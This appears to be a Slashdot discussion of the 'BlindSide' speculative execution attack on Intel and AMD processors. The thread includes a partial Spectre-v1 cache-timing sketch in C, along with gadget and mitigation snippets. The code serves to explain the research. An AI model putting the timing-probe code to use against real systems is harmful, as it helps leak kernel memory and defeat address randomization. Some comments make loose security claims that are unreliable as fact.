Security Researchers Detail New 'BlindSide' Speculative Execution Attack (phoronix.com)
"Security researchers from Amsterdam have publicly detailed 'BlindSide' as a new speculative execution attack vector for both Intel and AMD processors," reports Phoronix:
BlindSide is self-described as being able to "mount BROP-style attacks in the speculative execution domain to repeatedly probe and derandomize the kernel address space, craft arbitrary memory read gadgets, and enable reliable exploitation. This works even in the face of strong randomization schemes, e.g., the recent FGKASLR or fine-grained schemes based on execute-only memory, and state-of-the-art mitigations against Spectre and other transient execution attacks."
From a single buffer overflow in the kernel, the researchers demonstrate three BlindSide exploits: breaking KASLR (Kernel Address Space Layout Randomization), breaking arbitrary randomization schemes, and even breaking fine-grained randomization.
There's more information on the researchers' website, and they've also created an informational video.
And here's a crucial excerpt from their paper shared by Slashdot reader Hmmmmmm: In addition to the Intel Whiskey Lake CPU in our evaluation, we confirmed similar results on Intel Xeon E3-1505M v5, Xeon E3-1270 v6 and Core i9-9900K CPUs, based on the Skylake, Kaby Lake and Coffee Lake microarchitectures, respectively, as well as on AMD Ryzen 7 2700X and Ryzen 7 3700X CPUs, which are based on the Zen+ and Zen 2 microarchitectures.
Overall, our results confirm speculative probing is effective on a modern Linux system on different microarchitectures, hardened with the latest mitigations.
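To make the primitive concrete: speculative probing attacks like this build on the classic Spectre-style cache covert channel. Below is a minimal user-space sketch of that channel, not BlindSide's actual kernel exploit; the array names and the CACHE_HIT_THRESHOLD value are illustrative stand-ins:

    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>              /* _mm_clflush, __rdtscp */

    #define CACHE_HIT_THRESHOLD 80      /* cycles; tune per machine */

    uint8_t array1[16];
    unsigned array1_size = 16;
    uint8_t probe_array[256 * 512];

    /* The classic Spectre-v1 shape: a mistrained bounds check lets a
       speculative out-of-bounds load leave a footprint in the cache. */
    void victim(size_t x) {
        if (x < array1_size) {                      /* predicted taken */
            uint8_t secret = array1[x];             /* speculative OOB load */
            (void)*(volatile uint8_t *)&probe_array[secret * 512];
        }
    }

    /* Recover one byte by timing which probe_array line became hot. */
    int recover_byte(void) {
        unsigned junk;
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe_array[i * 512]);
        /* ... train the branch, then call victim() with an out-of-bounds x ... */
        for (int i = 0; i < 256; i++) {
            uint64_t t0 = __rdtscp(&junk);
            (void)*(volatile uint8_t *)&probe_array[i * 512];
            if (__rdtscp(&junk) - t0 < CACHE_HIT_THRESHOLD)
                return i;                           /* hot line = candidate byte */
        }
        return -1;
    }

As the summary above describes, BlindSide's twist is aiming this kind of probe at kernel addresses from a speculatively hijacked branch, so crashes and fault reports never surface.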
Re: (Score:1, Funny)
BSD, no hyper-threading
Be smarter than that. (Score:3)
What makes you think any OS would be immune to a flaw in the CPU?
Hardware flaws affect every OS.
Re: (Score:2)
What makes you think any OS would be immune to a flaw in the CPU?
Hardware flaws affect every OS.
Hardware can be weak, but the success of an attack relies on having something to attack. This is precisely why most speculative execution attacks are irrelevant: the OS randomises memory allocation and can also detect a complete exfiltration of data by analysing network patterns.
That's why I'm most curious about their mention of breaking ASLR, since that's a very effective mitigation not against spec-execution attacks working on a machine, but rather against spec-execution attacks being useful to an attacker.
Re: (Score:2, Troll)
Shut up, Satya.
Negative speed gains (Score:2)
As processors get faster, the code necessary to mitigate the vulnerabilities they add makes for (at best) a break-even net speed increase.
Re: (Score:3)
The mitigations section of this paper isn't very cheerful about the impact of any code mitigations to this:
building on Spectre-BCB mitigations, we would add fence instructions behind all the conditional branches that are shortly followed by indirect branch instructions. Unfortunately, our analysis shows these gadgets are pervasive and this strategy would severely limit the number of conditional branches that can benefit from speculation (and its performance gains).
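In source terms, that mitigation would look roughly like this (a hedged sketch; the paper describes compiler-inserted fences rather than giving code, and the names here are made up):

    #include <emmintrin.h>              /* _mm_lfence */

    typedef void (*handler_t)(void);
    extern handler_t dispatch_table[];

    void dispatch(int cond, unsigned idx) {
        if (cond) {
            /* Serialize execution so a mispredicted branch cannot reach
               the indirect call below speculatively (the Spectre-BCB
               pattern the paper extends). */
            _mm_lfence();
            dispatch_table[idx]();      /* indirect branch shortly after the test */
        }
    }

The paper's point is that conditional-branch-then-indirect-branch gadgets are so common in the kernel that fencing them all largely cancels the benefit of speculation.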
Deterministic Time Execution (Score:2)
There really should be a mode (this would require hardware and kernel support) in which you can specify that a program always gets a time slice that executes some maximum number of clocks (i.e. clock cycles counted as if all speculative execution fails), and if speculative execution results in faster execution, that just causes the OS to switch to some other process more quickly.
This wouldn't be trivial, because you have to commit to only delivering any data at the start of time slices (or otherwise limit access to fine-grained timing information).
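A user-space analogue of the idea (hypothetical; CYCLE_BUDGET and do_work are stand-ins) is to pad every unit of work to a fixed cycle count, so any speedup from speculation never becomes externally observable:

    #include <stdint.h>
    #include <x86intrin.h>              /* __rdtsc */

    #define CYCLE_BUDGET 1000000ULL     /* illustrative fixed budget */

    void do_work(void);                 /* the actual time-slice payload */

    void fixed_time_slice(void) {
        uint64_t start = __rdtsc();
        do_work();
        /* Burn whatever time speculation saved, so the slice always
           appears to take exactly CYCLE_BUDGET cycles from outside. */
        while (__rdtsc() - start < CYCLE_BUDGET)
            ;
    }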
A Bit Hard To Read (Score:3)
That paper is a bit hard to follow. Am I correct in understanding that the way it works is this: you set up some code which, on one path, loads a value from location SCANTARGET and then loads/jumps to a location ACONTROLLED if the value from SCANTARGET has some desired property. Now you prime the processor to predict that the path above gets taken, but actually ensure that it isn't taken. As a result, the speculative execution loads ACONTROLLED into the cache if SCANTARGET has the desired property, but because the whole thing happens beneath a non-taken, speculatively executed branch, no error is reported?
Or am I missing something?
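In rough C, the gadget shape described above would be something like this (names taken from the comment; the extern pointers are purely illustrative, since in the real attack SCANTARGET would be a kernel address):

    /* Sketch of the gadget described above. The branch is trained to be
       predicted taken but is architecturally not taken, so the loads
       run only speculatively and any fault is never reported. */
    extern volatile long *SCANTARGET;       /* address being probed */
    extern volatile char *ACONTROLLED;      /* attacker-observable cache line */

    void gadget(int trained_condition) {
        if (trained_condition) {            /* mispredicted as taken */
            long v = *SCANTARGET;           /* speculative load */
            if (v != 0)                     /* the "desired property" test */
                (void)*ACONTROLLED;         /* pulls ACONTROLLED into cache */
        }
        /* Afterwards, time an access to ACONTROLLED: a cache hit means
           SCANTARGET held a value with the desired property. */
    }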
Re:It's broken Jim. (Score:5, Informative)
Basically, ASLR (etc.) was invented to stop buffer-overrun exploits. And it actually works pretty well, but roughly a decade ago researchers found a way to overcome it, though it required three different buffer overflows. These people claim to be able to do it with a single buffer overflow in the kernel, but as I understand it, it requires them to be able to run code on the machine.
So this is a privilege escalation exploit, not a remote exploit. And privilege escalation exploits are unfortunately common in Linux.
Dump pipelining, use logical cores (Score:3)
For servers (where things really matter because $$$) they should completely dump execution pipelining and, with it, branch prediction. Instead of making one very fast CPU core, they should switch to having several logical cores for every physical core. The result would be CPUs that run N logical cores at 1/Nth the fully pipelined speed. Having 64 logical cores running at 600MHz each instead of 8 cores running at 4.8GHz would be slow enough to prevent cache delays and maximize efficiency in parallel-friendly loads.
Heavy-load server software has already been adapted to use a thread on every core, so modern software wouldn't need adaptation. Probably not going to sell gamers on massively parallel processing, but they aren't the cash cows that datacenters are anyway.
P.S. Yes, this has already been done before. See also: XMOS XCore.
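For reference, the thread-per-core pattern the parent mentions is only a few lines on Linux; a minimal sketch (assuming glibc's pthread_setaffinity_np; build with -pthread):

    #define _GNU_SOURCE
    #include <pthread.h>
    #include <sched.h>
    #include <unistd.h>

    /* One worker pinned to each online logical core. */
    static void *worker(void *arg) {
        long core = (long)arg;
        cpu_set_t set;
        CPU_ZERO(&set);
        CPU_SET(core, &set);
        pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
        /* ... per-core event loop goes here ... */
        return NULL;
    }

    int main(void) {
        long n = sysconf(_SC_NPROCESSORS_ONLN);
        for (long i = 0; i < n; i++) {
            pthread_t tid;
            pthread_create(&tid, NULL, worker, (void *)i);
        }
        pthread_exit(NULL);                 /* keep workers running */
    }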
Re: (Score:3)
That's where Sun was going at the end. It didn't really pan out. It turned out to be cheaper to just throw more big cores at the problem than to have all those lesser cores tied together.
Re: (Score:3)
Yes, software support is the key to success, which is likely the issue Sun kept running into. Ensuring all major server software packages can exploit massively parallel computing is vital.
Re: (Score:3)
Well, we were doing it on SunOS 4 and 5 with DQS back in the day, so I don't think that's the problem. I think the problem is that that sort of thing is limiting. It's better to have multiple related tasks on a given core, and be able to go faster sometimes. Sure, you're consuming more watts at lower power states than some more limited CPU that only goes that fast, but there's more there if you need it.
Re: (Score:2)
It's better to have multiple related tasks on a given core, and be able to go faster sometimes.
It's a matter of perspective. Sure, some businesses still buy their own servers, but now, with "cloud providers," the biggest buyers of chips don't give a shit about software design so long as the money comes in, and for lots of people the transition would be a non-issue. Should the new paradigm prove to be more cost effective (e.g. lower overall power consumption), then "cloud providers" would mark up the cost of the old x86 design. This would quickly cause many companies to modify their software to get the savings.
Re: (Score:2)
That's fine for servers, but the problem is, OS providers are forcing the rest of us to pay to mitigate attacks we will never see.
Give us the option to ignore all this bullshit, please.
Re: (Score:1)
That's fine for servers, but the problem is, OS providers are forcing the rest of us to pay to mitigate attacks we will never see.
Give us the option to ignore all this bullshit, please.
I think you worked for my last employer. Either what you do is totally pointless, or more likely you just don't see the attacks that are actually happening. Most of this stuff gets rolled into viruses pretty quickly. Security is an arms race, not a fixed target.
Re: (Score:3)
Give us the option to ignore all this bullshit, please.
There are other options that are secure but you aren't willing to pay for them. https://www.raptorcs.com/TALOS... [raptorcs.com]
Re: (Score:2)
Wow, you weren't kidding, we're really not willing to pay for them. Seven grand for an entry workstation? Lolwaffles.
Add to that the fact that POWER was one of only two architectures fully vulnerable to Meltdown, and it becomes really hilarious.
Re: (Score:2)
For servers (where things really matter because $$$) they should completely dump execution pipelining and with it, predictive branching.
You should propose that to Intel. They can come up with a fancy name for it, something that reflects how it's hardened against attacks. Like titanium. Except Intel... I know. Itanium! I'm sure a system which requires a paradigm shift in compilers will sell well.
Re: (Score:3)
"Premature optimization is the root of all evil". The quote is attributed to Donald Knuth, and this is an example of an "otimizatoin" which has bred entire industry of time wasted by trying to mitigate the resulting dangers and errors.
Re: (Score:2)
1. That's the opposite of logical cores.
2. The leakage will kill you until you co-optimize a new process. The thing about an un-pipelined processor is that most of the time each part is not doing anything; this is the original reason pipelining is useful. If you're going to replicate all the units N times, then you're going to pay N times the leakage even when they're not doing anything. For a typical microcontroller you deal with this by manufacturing in an ancient process with relatively long-channel transistors.
Needs a buffer overflow in the kernel (Score:4, Insightful)
If there is a buffer overflow in the kernel, things are already dire. That they can also explore execute-only memory is nice, but mostly an academic concern at this time. Hence this seems like pretty cool research, but not very much of a practical consideration at the moment.
Itanium (Score:2)
Poor Itanium, which everyone forgot about: it is not vulnerable to any of the CPU bugs since Spectre, and it is not vulnerable to this one either.
Why? Because it does not do any speculative anything in hardware. It's a massively parallel EPIC (VLIW-style) CPU that allows you to do all the speculative stuff in software, at compile time.
But this required smart programmers.
Which is why Itanium was sidelined and killed.
Now we bitch and moan about the bugs in the duct-taped and overclocked grand-grand-grand-child half clone of the 8086.
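For the curious, IA-64's compile-time speculation worked roughly like this (a hedged C rendering; real hardware uses ld.s/chk.s instruction pairs and NaT bits to defer and then check faults):

    /* Original source: the load is guarded by a branch. */
    int original(int *p, int ok) {
        if (ok)
            return *p;                  /* load runs only when safe */
        return 0;
    }

    /* What an IA-64 compiler could emit, rendered in C: the load is
       hoisted above the branch (ld.s, any fault deferred via a NaT
       bit), and a later check (chk.s) jumps to recovery code if the
       value is actually needed but the load had faulted. In plain C
       this hoisted load would of course fault immediately; deferring
       it is the hardware's job. */
    int speculated(int *p, int ok) {
        int v = *p;                     /* ld.s: speculative load */
        if (ok)                         /* branch resolves later */
            return v;                   /* chk.s: validate, recover if bad */
        return 0;
    }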